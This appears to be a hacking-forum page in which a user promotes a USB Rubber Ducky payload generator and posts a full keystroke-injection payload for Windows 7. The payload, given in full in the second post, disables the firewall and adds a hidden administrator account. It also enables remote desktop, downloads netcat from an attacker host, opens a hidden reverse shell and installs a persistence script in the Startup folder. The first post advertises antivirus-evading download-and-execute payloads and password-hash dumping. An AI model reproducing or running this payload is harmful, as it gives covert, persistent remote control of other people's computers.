Search the Community
Showing results for tags 'Simple-Ducky'.
Hello, In lieu of usbrubberducky.com being down I decided to create the Simple-Ducky Payload Generator. The simple-ducky is designed to quickly create reliable payloads and launch listener's.The Simple-Ducky currently uses version 2.6 of the duck encoder. The lastest version of the Simple-Ducky supports all Debian Linux distro's (i.e. Kali-Linux, Ubuntu, Linux Mint etc). The smart installer will take care of all the work for you. With the simple-ducky in a matter of seconds you can; * Create your evil executable (its automatically placed in your web directory) * Create your inject.bin * Launch a listener (meterpreter or netcat) * Generate custom password list's * Crack extracted passwords * And so much more... Note: This framework was designed to work with Kali Linux out of the box (JDK update is required and included with the simple-ducky). However, it should work with other Linux distro's as long as you install the required dependencies (see the wiki page for other than Kali installs). Installation Installing the simple-ducky just got even easier. Just download the install script, then copy and paste the lines below into your terminal.The install script now supports all Debian based Linux distro's. Install videos are available on the Google code page: https://code.google.com/p/simple-ducky-payload-generator/ There are now two options to install the simple ducky.... Download the install file: https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=installer_v1.1.1_debian.sh&can=2&q= root@kali:~# chmod +x installer_v1.1.1_debian.sh root@kali:~# ./installer_v1.1.1_debian.sh root@kali:~# rm installer_v1.1.1_debian.sh To run the program; root@kali:~# simple-ducky Change Log v1.1.1 Changes 1. Added tons of new features; Shells with dbd (incredibly powerful see video below) and the Custom Payload Builder 2. Cleaned up menu options, dependecies, and porcesses 3. Made bug fixes to several payloads 4. Replaced Netcat with Ncat v1.1.0 Changes 1. Upgraded the encoder to version 2.6 2. Made changes to the main menu 3. Added a new payload: LM/NTLM Hash Dump from a Live System 4. Added a new function: LM/NTLM Password Hasher 5. Added a new tool: Site2lst Custom Wordlist Builder 6. Upgraded the installer: Now there is just one version of the Simple-Ducky that supports all Debian distro's (Tested on: Kali-Linux, Ubuntu and Linux Mint v1.0.9 Changes 1. Added a new payload subset titled "Forced Phishing & Web Attacks" 2. Intergrated: SE-Toolkikt, Metasploit's Browser_Autopwn, and BurpSuite. 3. Added Payload: Local DNS Poisoning | SE-Toolkit Java Applet Attack 4. Added Payload: Local DNS Poisoning | Metasploit's Browser_Autopwn 5. Added Payload: Proxy in the Middle (PiTM) | No Admin Access Needed | Burpsuite v1.0.8 Changes 1. Added OSX Single User Mode Reverse Shell Payload 2. Made minor scripting changes 3. Changed Encoder to version 2.5 4. Fixed bugs in the FTP Server Setup option 5. Created a User add function for the FTP Server Setup Option v1.0.7 Changes 1. Fixed command line entrance method on all Windows Vista/7 Payloads w/o UAC (Props to arzen) v1.0.6 Changes 1. Created two separate versions of the simple-ducky (One for Kali-Linux and the other for Other Linux Distros) * The purpose for the Kali-Edition is to follow the Debian compliance that Offensive-Security established in hopes of getting the Simple-Ducky prepacked in Kali-Linux. (Fingers-Crossed) 2. Removed the install dependencies option on the Kali-Linux version (Kali will keep these up to date)(Other-Linux version still has it) 3. Updated the Powershell Download & Execute Payloads to provide better obfuscation (tested on fully patched windows Vista/7/8 running McAfee) 4. Added a new function that configures the Pure-FTPD server for the user v1.0.5 Changes 1. Complete Payload and Menu Revamp v1.0.4 Changes 1. Added ~Persistence~ Payload 2. Updated Menu Options v1.0.3 Changes 1. Payload Update 2. Added 64bit JDK Update Support 3. Added initial delay function (allows you to set a custom delay for driver install time). 4. Changed encoder version from 2.4 to 3.0 v1.0.2 Changes 1. International keyboard mapping added. -- Tester's would be greatly appreciated. 2. Aesthetic changes to text. v1.0.1 Changes 1. Payload Update 2. Encoder downgraded from v3.0 to v2.4 due to issues encoding the Win 7 Reverse Shell payload. Custom Payload Builder and DBD... Watch as we get NT\SYSTEM level privs while evading AV! Thanks for checking out the Simple-Ducky. Please provide any feedback and bug fixes to firstname.lastname@example.org ~skysploit
Hello, Here's a new payload that I came up with. It targets Windows 7 w/UAC enabled. Here's what happens when you run it... Opens an admin command prompt Creates an admin user (default creds: hacker | mysecretpassword) Disables the windows firewall Enables remote desktop Enables remote assistance Hides the newly created admin account from the Windows Welcome Screen Creates a VBScript to run a hidden instance of Netcat Creates a batch file to launch Netcat (this is needed to mask an open netcat session from the desktop) Downloads netcat from the attackers web server (to transfer netcat to the web directory in kali use: cp /usr/share/windows-binaries/nc.exe /var/www/nc.exe)(launch apache by using: service apache2 start) Calls the VBScript to launch the hidden netcat shell Creates a batch file in the startup directory that will launch the VBScript every time a user logs in (the batch file is hidden/transparent to the user while it runs) So here it is... I will add a fully configurable version of ~Persistence~ to the Simple-Ducky Payload Generator this weekend. ~skysploit DELAY 5000 ESCAPE DELAY 300 CONTROL ESCAPE DELAY 300 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW DELAY 300 ENTER DELAY 800 STRING netsh firewall set opmode disable ENTER DELAY 300 STRING net user hacker mysecretpassword /add && net localgroup administrators hacker /add ENTER DELAY 200 STRING y ENTER DELAY 400 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING copy con nc.vbs ENTER STRING Set WshShell = CreateObject("WScript.Shell") ENTER STRING WshShell.Run chr(34) & "c:\Windows\System32\nc.bat" & Chr(34), 0, false ENTER STRING Set WshShell = Nothing ENTER CTRL z ENTER STRING echo cmdow @ /hid >> nc.bat ENTER STRING echo nc -nv 172.16.1.5 4444 -e cmd.exe >> nc.bat ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http://172.16.1.5/nc.exe,c:\Windows\system32\nc.exe'); ENTER STRING cscript nc.vbs ENTER STRING cd c:\Documents And Settings\All Users\Start Menu\Programs\Startup\ ENTER STRING echo cmdow @ /hid >> persistence.bat ENTER STRING echo cscript c:\Windows\System32\nc.vbs >> persistence.bat ENTER STRING exit ENTER